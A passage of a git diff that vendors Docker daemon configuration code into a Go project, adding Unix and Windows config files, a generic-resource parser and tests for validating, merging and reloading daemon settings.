runtimes[StockRuntimeName]; ok { + return fmt.Errorf("runtime name '%s' is reserved", StockRuntimeName) } } - if defaultRuntime := config.GetDefaultRuntimeName(); defaultRuntime != "" && defaultRuntime != stockRuntimeName { + if _, err := ParseGenericResources(config.NodeGenericResources); err != nil { + return err + } + + if defaultRuntime := config.GetDefaultRuntimeName(); defaultRuntime != "" && defaultRuntime != StockRuntimeName { runtimes := config.GetAllRuntimes() if _, ok := runtimes[defaultRuntime]; !ok { return fmt.Errorf("specified default runtime '%s' does not exist", defaultRuntime) } } - return nil + // validate platform-specific settings + return config.ValidatePlatformConfig() +} + +// ModifiedDiscoverySettings returns whether the discovery configuration has been modified or not. 
+func ModifiedDiscoverySettings(config *Config, backendType, advertise string, clusterOpts map[string]string) bool { + if config.ClusterStore != backendType || config.ClusterAdvertise != advertise { + return true + } + + if (config.ClusterOpts == nil && clusterOpts == nil) || + (config.ClusterOpts == nil && len(clusterOpts) == 0) || + (len(config.ClusterOpts) == 0 && clusterOpts == nil) { + return false + } + + return !reflect.DeepEqual(config.ClusterOpts, clusterOpts) } diff --git a/vendor/github.com/docker/docker/daemon/config/config_common_unix.go b/vendor/github.com/docker/docker/daemon/config/config_common_unix.go new file mode 100644 index 0000000000..4bdf758869 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_common_unix.go @@ -0,0 +1,71 @@ +// +build linux freebsd + +package config // import "github.com/docker/docker/daemon/config" + +import ( + "net" + + "github.com/docker/docker/api/types" +) + +// CommonUnixConfig defines configuration of a docker daemon that is +// common across Unix platforms. 
+type CommonUnixConfig struct { + Runtimes map[string]types.Runtime `json:"runtimes,omitempty"` + DefaultRuntime string `json:"default-runtime,omitempty"` + DefaultInitBinary string `json:"default-init,omitempty"` +} + +type commonUnixBridgeConfig struct { + DefaultIP net.IP `json:"ip,omitempty"` + IP string `json:"bip,omitempty"` + DefaultGatewayIPv4 net.IP `json:"default-gateway,omitempty"` + DefaultGatewayIPv6 net.IP `json:"default-gateway-v6,omitempty"` + InterContainerCommunication bool `json:"icc,omitempty"` +} + +// GetRuntime returns the runtime path and arguments for a given +// runtime name +func (conf *Config) GetRuntime(name string) *types.Runtime { + conf.Lock() + defer conf.Unlock() + if rt, ok := conf.Runtimes[name]; ok { + return &rt + } + return nil +} + +// GetDefaultRuntimeName returns the current default runtime +func (conf *Config) GetDefaultRuntimeName() string { + conf.Lock() + rt := conf.DefaultRuntime + conf.Unlock() + + return rt +} + +// GetAllRuntimes returns a copy of the runtimes map +func (conf *Config) GetAllRuntimes() map[string]types.Runtime { + conf.Lock() + rts := conf.Runtimes + conf.Unlock() + return rts +} + +// GetExecRoot returns the user configured Exec-root +func (conf *Config) GetExecRoot() string { + return conf.ExecRoot +} + +// GetInitPath returns the configured docker-init path +func (conf *Config) GetInitPath() string { + conf.Lock() + defer conf.Unlock() + if conf.InitPath != "" { + return conf.InitPath + } + if conf.DefaultInitBinary != "" { + return conf.DefaultInitBinary + } + return DefaultInitBinary +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go b/vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go new file mode 100644 index 0000000000..47774a8ec1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_common_unix_test.go @@ -0,0 +1,84 @@ +// +build !windows + +package config // import "github.com/docker/docker/daemon/config" + 
+import ( + "testing" + + "github.com/docker/docker/api/types" +) + +func TestCommonUnixValidateConfigurationErrors(t *testing.T) { + testCases := []struct { + config *Config + }{ + // Can't override the stock runtime + { + config: &Config{ + CommonUnixConfig: CommonUnixConfig{ + Runtimes: map[string]types.Runtime{ + StockRuntimeName: {}, + }, + }, + }, + }, + // Default runtime should be present in runtimes + { + config: &Config{ + CommonUnixConfig: CommonUnixConfig{ + Runtimes: map[string]types.Runtime{ + "foo": {}, + }, + DefaultRuntime: "bar", + }, + }, + }, + } + for _, tc := range testCases { + err := Validate(tc.config) + if err == nil { + t.Fatalf("expected error, got nil for config %v", tc.config) + } + } +} + +func TestCommonUnixGetInitPath(t *testing.T) { + testCases := []struct { + config *Config + expectedInitPath string + }{ + { + config: &Config{ + InitPath: "some-init-path", + }, + expectedInitPath: "some-init-path", + }, + { + config: &Config{ + CommonUnixConfig: CommonUnixConfig{ + DefaultInitBinary: "foo-init-bin", + }, + }, + expectedInitPath: "foo-init-bin", + }, + { + config: &Config{ + InitPath: "init-path-A", + CommonUnixConfig: CommonUnixConfig{ + DefaultInitBinary: "init-path-B", + }, + }, + expectedInitPath: "init-path-A", + }, + { + config: &Config{}, + expectedInitPath: "docker-init", + }, + } + for _, tc := range testCases { + initPath := tc.config.GetInitPath() + if initPath != tc.expectedInitPath { + t.Fatalf("expected initPath to be %v, got %v", tc.expectedInitPath, initPath) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_test.go b/vendor/github.com/docker/docker/daemon/config/config_test.go new file mode 100644 index 0000000000..6998ed3312 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_test.go @@ -0,0 +1,518 @@ +package config // import "github.com/docker/docker/daemon/config" + +import ( + "io/ioutil" + "os" + "strings" + "testing" + + 
"github.com/docker/docker/daemon/discovery" + "github.com/docker/docker/opts" + "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" + "gotest.tools/skip" +) + +func TestDaemonConfigurationNotFound(t *testing.T) { + _, err := MergeDaemonConfigurations(&Config{}, nil, "/tmp/foo-bar-baz-docker") + if err == nil || !os.IsNotExist(err) { + t.Fatalf("expected does not exist error, got %v", err) + } +} + +func TestDaemonBrokenConfiguration(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"Debug": tru`)) + f.Close() + + _, err = MergeDaemonConfigurations(&Config{}, nil, configFile) + if err == nil { + t.Fatalf("expected error, got %v", err) + } +} + +func TestParseClusterAdvertiseSettings(t *testing.T) { + _, err := ParseClusterAdvertiseSettings("something", "") + if err != discovery.ErrDiscoveryDisabled { + t.Fatalf("expected discovery disabled error, got %v\n", err) + } + + _, err = ParseClusterAdvertiseSettings("", "something") + if err == nil { + t.Fatalf("expected discovery store error, got %v\n", err) + } + + _, err = ParseClusterAdvertiseSettings("etcd", "127.0.0.1:8080") + if err != nil { + t.Fatal(err) + } +} + +func TestFindConfigurationConflicts(t *testing.T) { + config := map[string]interface{}{"authorization-plugins": "foobar"} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + flags.String("authorization-plugins", "", "") + assert.Check(t, flags.Set("authorization-plugins", "asdf")) + assert.Check(t, is.ErrorContains(findConfigurationConflicts(config, flags), "authorization-plugins: (from flag: asdf, from file: foobar)")) +} + +func TestFindConfigurationConflictsWithNamedOptions(t *testing.T) { + config := map[string]interface{}{"hosts": []string{"qwer"}} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + var hosts []string + flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, 
opts.ValidateHost), "host", "H", "Daemon socket(s) to connect to") + assert.Check(t, flags.Set("host", "tcp://127.0.0.1:4444")) + assert.Check(t, flags.Set("host", "unix:///var/run/docker.sock")) + assert.Check(t, is.ErrorContains(findConfigurationConflicts(config, flags), "hosts")) +} + +func TestDaemonConfigurationMergeConflicts(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"debug": true}`)) + f.Close() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.Bool("debug", false, "") + flags.Set("debug", "false") + + _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "debug") { + t.Fatalf("expected debug conflict, got %v", err) + } +} + +func TestDaemonConfigurationMergeConcurrent(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"max-concurrent-downloads": 1}`)) + f.Close() + + _, err = MergeDaemonConfigurations(&Config{}, nil, configFile) + if err != nil { + t.Fatal("expected error, got nil") + } +} + +func TestDaemonConfigurationMergeConcurrentError(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"max-concurrent-downloads": -1}`)) + f.Close() + + _, err = MergeDaemonConfigurations(&Config{}, nil, configFile) + if err == nil { + t.Fatalf("expected no error, got error %v", err) + } +} + +func TestDaemonConfigurationMergeConflictsWithInnerStructs(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"tlscacert": "/etc/certificates/ca.pem"}`)) + f.Close() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("tlscacert", "", "") + 
flags.Set("tlscacert", "~/.docker/ca.pem") + + _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "tlscacert") { + t.Fatalf("expected tlscacert conflict, got %v", err) + } +} + +func TestFindConfigurationConflictsWithUnknownKeys(t *testing.T) { + config := map[string]interface{}{"tls-verify": "true"} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + flags.Bool("tlsverify", false, "") + err := findConfigurationConflicts(config, flags) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "the following directives don't match any configuration option: tls-verify") { + t.Fatalf("expected tls-verify conflict, got %v", err) + } +} + +func TestFindConfigurationConflictsWithMergedValues(t *testing.T) { + var hosts []string + config := map[string]interface{}{"hosts": "tcp://127.0.0.1:2345"} + flags := pflag.NewFlagSet("base", pflag.ContinueOnError) + flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, nil), "host", "H", "") + + err := findConfigurationConflicts(config, flags) + if err != nil { + t.Fatal(err) + } + + flags.Set("host", "unix:///var/run/docker.sock") + err = findConfigurationConflicts(config, flags) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "hosts: (from flag: [unix:///var/run/docker.sock], from file: tcp://127.0.0.1:2345)") { + t.Fatalf("expected hosts conflict, got %v", err) + } +} + +func TestValidateReservedNamespaceLabels(t *testing.T) { + for _, validLabels := range [][]string{ + nil, // no error if there are no labels + { // no error if there aren't any reserved namespace labels + "hello=world", + "label=me", + }, + { // only reserved namespaces that end with a dot are invalid + "com.dockerpsychnotreserved.label=value", + "io.dockerproject.not=reserved", + "org.docker.not=reserved", + }, + } { + assert.Check(t, 
ValidateReservedNamespaceLabels(validLabels)) + } + + for _, invalidLabel := range []string{ + "com.docker.feature=enabled", + "io.docker.configuration=0", + "org.dockerproject.setting=on", + // casing doesn't matter + "COM.docker.feature=enabled", + "io.DOCKER.CONFIGURATION=0", + "Org.Dockerproject.Setting=on", + } { + err := ValidateReservedNamespaceLabels([]string{ + "valid=label", + invalidLabel, + "another=valid", + }) + assert.Check(t, is.ErrorContains(err, invalidLabel)) + } +} + +func TestValidateConfigurationErrors(t *testing.T) { + minusNumber := -10 + testCases := []struct { + config *Config + }{ + { + config: &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"one"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"foo=bar", "one"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNS: []string{"1.1.1.1o"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNS: []string{"2.2.2.2", "1.1.1.1o"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNSSearch: []string{"123456"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNSSearch: []string{"a.b.c", "123456"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + MaxConcurrentDownloads: &minusNumber, + // This is weird... + ValuesSet: map[string]interface{}{ + "max-concurrent-downloads": -1, + }, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + MaxConcurrentUploads: &minusNumber, + // This is weird... 
+ ValuesSet: map[string]interface{}{ + "max-concurrent-uploads": -1, + }, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + NodeGenericResources: []string{"foo"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + NodeGenericResources: []string{"foo=bar", "foo=1"}, + }, + }, + }, + } + for _, tc := range testCases { + err := Validate(tc.config) + if err == nil { + t.Fatalf("expected error, got nil for config %v", tc.config) + } + } +} + +func TestValidateConfiguration(t *testing.T) { + minusNumber := 4 + testCases := []struct { + config *Config + }{ + { + config: &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"one=two"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNS: []string{"1.1.1.1"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + DNSSearch: []string{"a.b.c"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + MaxConcurrentDownloads: &minusNumber, + // This is weird... + ValuesSet: map[string]interface{}{ + "max-concurrent-downloads": -1, + }, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + MaxConcurrentUploads: &minusNumber, + // This is weird... 
+ ValuesSet: map[string]interface{}{ + "max-concurrent-uploads": -1, + }, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + NodeGenericResources: []string{"foo=bar", "foo=baz"}, + }, + }, + }, + { + config: &Config{ + CommonConfig: CommonConfig{ + NodeGenericResources: []string{"foo=1"}, + }, + }, + }, + } + for _, tc := range testCases { + err := Validate(tc.config) + if err != nil { + t.Fatalf("expected no error, got error %v", err) + } + } +} + +func TestModifiedDiscoverySettings(t *testing.T) { + cases := []struct { + current *Config + modified *Config + expected bool + }{ + { + current: discoveryConfig("foo", "bar", map[string]string{}), + modified: discoveryConfig("foo", "bar", map[string]string{}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", map[string]string{}), + modified: discoveryConfig("foo", "bar", nil), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "bar", map[string]string{}), + expected: false, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("baz", "bar", nil), + expected: true, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "baz", nil), + expected: true, + }, + { + current: discoveryConfig("foo", "bar", nil), + modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}), + expected: true, + }, + } + + for _, c := range cases { + got := ModifiedDiscoverySettings(c.current, c.modified.ClusterStore, c.modified.ClusterAdvertise, c.modified.ClusterOpts) + if c.expected != got { + t.Fatalf("expected %v, got %v: current config %v, new config %v", c.expected, got, c.current, c.modified) + } + } +} + +func discoveryConfig(backendAddr, advertiseAddr string, opts map[string]string) 
*Config { + return &Config{ + CommonConfig: CommonConfig{ + ClusterStore: backendAddr, + ClusterAdvertise: advertiseAddr, + ClusterOpts: opts, + }, + } +} + +// TestReloadSetConfigFileNotExist tests that when `--config-file` is set +// and it doesn't exist the `Reload` function returns an error. +func TestReloadSetConfigFileNotExist(t *testing.T) { + configFile := "/tmp/blabla/not/exists/config.json" + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("config-file", "", "") + flags.Set("config-file", configFile) + + err := Reload(configFile, flags, func(c *Config) {}) + assert.Check(t, is.ErrorContains(err, "unable to configure the Docker daemon with file")) +} + +// TestReloadDefaultConfigNotExist tests that if the default configuration file +// doesn't exist the daemon still will be reloaded. +func TestReloadDefaultConfigNotExist(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + reloaded := false + configFile := "/etc/docker/daemon.json" + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("config-file", configFile, "") + err := Reload(configFile, flags, func(c *Config) { + reloaded = true + }) + assert.Check(t, err) + assert.Check(t, reloaded) +} + +// TestReloadBadDefaultConfig tests that when `--config-file` is not set +// and the default configuration file exists and is bad return an error +func TestReloadBadDefaultConfig(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{wrong: "configuration"}`)) + f.Close() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("config-file", configFile, "") + err = Reload(configFile, flags, func(c *Config) {}) + assert.Check(t, is.ErrorContains(err, "unable to configure the Docker daemon with file")) +} + +func TestReloadWithConflictingLabels(t *testing.T) { + tempFile := fs.NewFile(t, "config", 
fs.WithContent(`{"labels":["foo=bar","foo=baz"]}`)) + defer tempFile.Remove() + configFile := tempFile.Path() + + var lbls []string + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("config-file", configFile, "") + flags.StringSlice("labels", lbls, "") + err := Reload(configFile, flags, func(c *Config) {}) + assert.Check(t, is.ErrorContains(err, "conflict labels for foo=baz and foo=bar")) +} + +func TestReloadWithDuplicateLabels(t *testing.T) { + tempFile := fs.NewFile(t, "config", fs.WithContent(`{"labels":["foo=the-same","foo=the-same"]}`)) + defer tempFile.Remove() + configFile := tempFile.Path() + + var lbls []string + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("config-file", configFile, "") + flags.StringSlice("labels", lbls, "") + err := Reload(configFile, flags, func(c *Config) {}) + assert.Check(t, err) +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_unix.go b/vendor/github.com/docker/docker/daemon/config/config_unix.go new file mode 100644 index 0000000000..1970928f9b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_unix.go @@ -0,0 +1,87 @@ +// +build linux freebsd + +package config // import "github.com/docker/docker/daemon/config" + +import ( + "fmt" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/opts" + "github.com/docker/go-units" +) + +const ( + // DefaultIpcMode is default for container's IpcMode, if not set otherwise + DefaultIpcMode = "shareable" // TODO: change to private +) + +// Config defines the configuration of a docker daemon. +// It includes json tags to deserialize configuration from a file +// using the same names that the flags in the command line uses. +type Config struct { + CommonConfig + + // These fields are common to all unix platforms. + CommonUnixConfig + // Fields below here are platform specific. 
+ CgroupParent string `json:"cgroup-parent,omitempty"` + EnableSelinuxSupport bool `json:"selinux-enabled,omitempty"` + RemappedRoot string `json:"userns-remap,omitempty"` + Ulimits map[string]*units.Ulimit `json:"default-ulimits,omitempty"` + CPURealtimePeriod int64 `json:"cpu-rt-period,omitempty"` + CPURealtimeRuntime int64 `json:"cpu-rt-runtime,omitempty"` + OOMScoreAdjust int `json:"oom-score-adjust,omitempty"` + Init bool `json:"init,omitempty"` + InitPath string `json:"init-path,omitempty"` + SeccompProfile string `json:"seccomp-profile,omitempty"` + ShmSize opts.MemBytes `json:"default-shm-size,omitempty"` + NoNewPrivileges bool `json:"no-new-privileges,omitempty"` + IpcMode string `json:"default-ipc-mode,omitempty"` +} + +// BridgeConfig stores all the bridge driver specific +// configuration. +type BridgeConfig struct { + commonBridgeConfig + + // These fields are common to all unix platforms. + commonUnixBridgeConfig + + // Fields below here are platform specific. + EnableIPv6 bool `json:"ipv6,omitempty"` + EnableIPTables bool `json:"iptables,omitempty"` + EnableIPForward bool `json:"ip-forward,omitempty"` + EnableIPMasq bool `json:"ip-masq,omitempty"` + EnableUserlandProxy bool `json:"userland-proxy,omitempty"` + UserlandProxyPath string `json:"userland-proxy-path,omitempty"` + FixedCIDRv6 string `json:"fixed-cidr-v6,omitempty"` +} + +// IsSwarmCompatible defines if swarm mode can be enabled in this config +func (conf *Config) IsSwarmCompatible() error { + if conf.ClusterStore != "" || conf.ClusterAdvertise != "" { + return fmt.Errorf("--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode") + } + if conf.LiveRestoreEnabled { + return fmt.Errorf("--live-restore daemon configuration is incompatible with swarm mode") + } + return nil +} + +func verifyDefaultIpcMode(mode string) error { + const hint = "Use \"shareable\" or \"private\"." 
+ + dm := containertypes.IpcMode(mode) + if !dm.Valid() { + return fmt.Errorf("Default IPC mode setting (%v) is invalid. "+hint, dm) + } + if dm != "" && !dm.IsPrivate() && !dm.IsShareable() { + return fmt.Errorf("IPC mode \"%v\" is not supported as default value. "+hint, dm) + } + return nil +} + +// ValidatePlatformConfig checks if any platform-specific configuration settings are invalid. +func (conf *Config) ValidatePlatformConfig() error { + return verifyDefaultIpcMode(conf.IpcMode) +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_unix_test.go b/vendor/github.com/docker/docker/daemon/config/config_unix_test.go new file mode 100644 index 0000000000..529b677705 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_unix_test.go @@ -0,0 +1,134 @@ +// +build !windows + +package config // import "github.com/docker/docker/daemon/config" + +import ( + "testing" + + "github.com/docker/docker/opts" + "github.com/docker/go-units" + "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/fs" +) + +func TestGetConflictFreeConfiguration(t *testing.T) { + configFileData := ` + { + "debug": true, + "default-ulimits": { + "nofile": { + "Name": "nofile", + "Hard": 2048, + "Soft": 1024 + } + }, + "log-opts": { + "tag": "test_tag" + } + }` + + file := fs.NewFile(t, "docker-config", fs.WithContent(configFileData)) + defer file.Remove() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + var debug bool + flags.BoolVarP(&debug, "debug", "D", false, "") + flags.Var(opts.NewNamedUlimitOpt("default-ulimits", nil), "default-ulimit", "") + flags.Var(opts.NewNamedMapOpts("log-opts", nil, nil), "log-opt", "") + + cc, err := getConflictFreeConfiguration(file.Path(), flags) + assert.NilError(t, err) + + assert.Check(t, cc.Debug) + + expectedUlimits := map[string]*units.Ulimit{ + "nofile": { + Name: "nofile", + Hard: 2048, + Soft: 1024, + }, + } + + assert.Check(t, is.DeepEqual(expectedUlimits, 
cc.Ulimits)) +} + +func TestDaemonConfigurationMerge(t *testing.T) { + configFileData := ` + { + "debug": true, + "default-ulimits": { + "nofile": { + "Name": "nofile", + "Hard": 2048, + "Soft": 1024 + } + }, + "log-opts": { + "tag": "test_tag" + } + }` + + file := fs.NewFile(t, "docker-config", fs.WithContent(configFileData)) + defer file.Remove() + + c := &Config{ + CommonConfig: CommonConfig{ + AutoRestart: true, + LogConfig: LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test"}, + }, + }, + } + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + var debug bool + flags.BoolVarP(&debug, "debug", "D", false, "") + flags.Var(opts.NewNamedUlimitOpt("default-ulimits", nil), "default-ulimit", "") + flags.Var(opts.NewNamedMapOpts("log-opts", nil, nil), "log-opt", "") + + cc, err := MergeDaemonConfigurations(c, flags, file.Path()) + assert.NilError(t, err) + + assert.Check(t, cc.Debug) + assert.Check(t, cc.AutoRestart) + + expectedLogConfig := LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test_tag"}, + } + + assert.Check(t, is.DeepEqual(expectedLogConfig, cc.LogConfig)) + + expectedUlimits := map[string]*units.Ulimit{ + "nofile": { + Name: "nofile", + Hard: 2048, + Soft: 1024, + }, + } + + assert.Check(t, is.DeepEqual(expectedUlimits, cc.Ulimits)) +} + +func TestDaemonConfigurationMergeShmSize(t *testing.T) { + data := `{"default-shm-size": "1g"}` + + file := fs.NewFile(t, "docker-config", fs.WithContent(data)) + defer file.Remove() + + c := &Config{} + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + shmSize := opts.MemBytes(DefaultShmSize) + flags.Var(&shmSize, "default-shm-size", "") + + cc, err := MergeDaemonConfigurations(c, flags, file.Path()) + assert.NilError(t, err) + + expectedValue := 1 * 1024 * 1024 * 1024 + assert.Check(t, is.Equal(int64(expectedValue), cc.ShmSize.Value())) +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_windows.go 
b/vendor/github.com/docker/docker/daemon/config/config_windows.go new file mode 100644 index 0000000000..0aa7d54bf2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_windows.go @@ -0,0 +1,57 @@ +package config // import "github.com/docker/docker/daemon/config" + +import ( + "github.com/docker/docker/api/types" +) + +// BridgeConfig stores all the bridge driver specific +// configuration. +type BridgeConfig struct { + commonBridgeConfig +} + +// Config defines the configuration of a docker daemon. +// These are the configuration settings that you pass +// to the docker daemon when you launch it with say: `dockerd -e windows` +type Config struct { + CommonConfig + + // Fields below here are platform specific. (There are none presently + // for the Windows daemon.) +} + +// GetRuntime returns the runtime path and arguments for a given +// runtime name +func (conf *Config) GetRuntime(name string) *types.Runtime { + return nil +} + +// GetInitPath returns the configure docker-init path +func (conf *Config) GetInitPath() string { + return "" +} + +// GetDefaultRuntimeName returns the current default runtime +func (conf *Config) GetDefaultRuntimeName() string { + return StockRuntimeName +} + +// GetAllRuntimes returns a copy of the runtimes map +func (conf *Config) GetAllRuntimes() map[string]types.Runtime { + return map[string]types.Runtime{} +} + +// GetExecRoot returns the user configured Exec-root +func (conf *Config) GetExecRoot() string { + return "" +} + +// IsSwarmCompatible defines if swarm mode can be enabled in this config +func (conf *Config) IsSwarmCompatible() error { + return nil +} + +// ValidatePlatformConfig checks if any platform-specific configuration settings are invalid. 
+func (conf *Config) ValidatePlatformConfig() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/config/config_windows_test.go b/vendor/github.com/docker/docker/daemon/config/config_windows_test.go new file mode 100644 index 0000000000..09417ee388 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/config_windows_test.go @@ -0,0 +1,60 @@ +// +build windows + +package config // import "github.com/docker/docker/daemon/config" + +import ( + "io/ioutil" + "testing" + + "github.com/docker/docker/opts" + "github.com/spf13/pflag" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDaemonConfigurationMerge(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + + f.Write([]byte(` + { + "debug": true, + "log-opts": { + "tag": "test_tag" + } + }`)) + + f.Close() + + c := &Config{ + CommonConfig: CommonConfig{ + AutoRestart: true, + LogConfig: LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test"}, + }, + }, + } + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + var debug bool + flags.BoolVarP(&debug, "debug", "D", false, "") + flags.Var(opts.NewNamedMapOpts("log-opts", nil, nil), "log-opt", "") + + cc, err := MergeDaemonConfigurations(c, flags, configFile) + assert.NilError(t, err) + + assert.Check(t, cc.Debug) + assert.Check(t, cc.AutoRestart) + + expectedLogConfig := LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test_tag"}, + } + + assert.Check(t, is.DeepEqual(expectedLogConfig, cc.LogConfig)) +} diff --git a/vendor/github.com/docker/docker/daemon/config/opts.go b/vendor/github.com/docker/docker/daemon/config/opts.go new file mode 100644 index 0000000000..8b114929fb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config/opts.go @@ -0,0 +1,22 @@ +package config // import "github.com/docker/docker/daemon/config" + +import ( + "github.com/docker/docker/api/types/swarm" + 
"github.com/docker/docker/daemon/cluster/convert" + "github.com/docker/swarmkit/api/genericresource" +) + +// ParseGenericResources parses and validates the specified string as a list of GenericResource +func ParseGenericResources(value []string) ([]swarm.GenericResource, error) { + if len(value) == 0 { + return nil, nil + } + + resources, err := genericresource.Parse(value) + if err != nil { + return nil, err + } + + obj := convert.GenericResourcesFromGRPC(resources) + return obj, nil +} diff --git a/vendor/github.com/docker/docker/daemon/config_common_unix.go b/vendor/github.com/docker/docker/daemon/config_common_unix.go deleted file mode 100644 index ab76fe7b1b..0000000000 --- a/vendor/github.com/docker/docker/daemon/config_common_unix.go +++ /dev/null @@ -1,90 +0,0 @@ -// +build solaris linux freebsd - -package daemon - -import ( - "net" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/pflag" -) - -// CommonUnixConfig defines configuration of a docker daemon that is -// common across Unix platforms. -type CommonUnixConfig struct { - ExecRoot string `json:"exec-root,omitempty"` - ContainerdAddr string `json:"containerd,omitempty"` - Runtimes map[string]types.Runtime `json:"runtimes,omitempty"` - DefaultRuntime string `json:"default-runtime,omitempty"` -} - -type commonUnixBridgeConfig struct { - DefaultIP net.IP `json:"ip,omitempty"` - IP string `json:"bip,omitempty"` - DefaultGatewayIPv4 net.IP `json:"default-gateway,omitempty"` - DefaultGatewayIPv6 net.IP `json:"default-gateway-v6,omitempty"` - InterContainerCommunication bool `json:"icc,omitempty"` -} - -// InstallCommonUnixFlags adds command-line options to the top-level flag parser for -// the current process that are common across Unix platforms. 
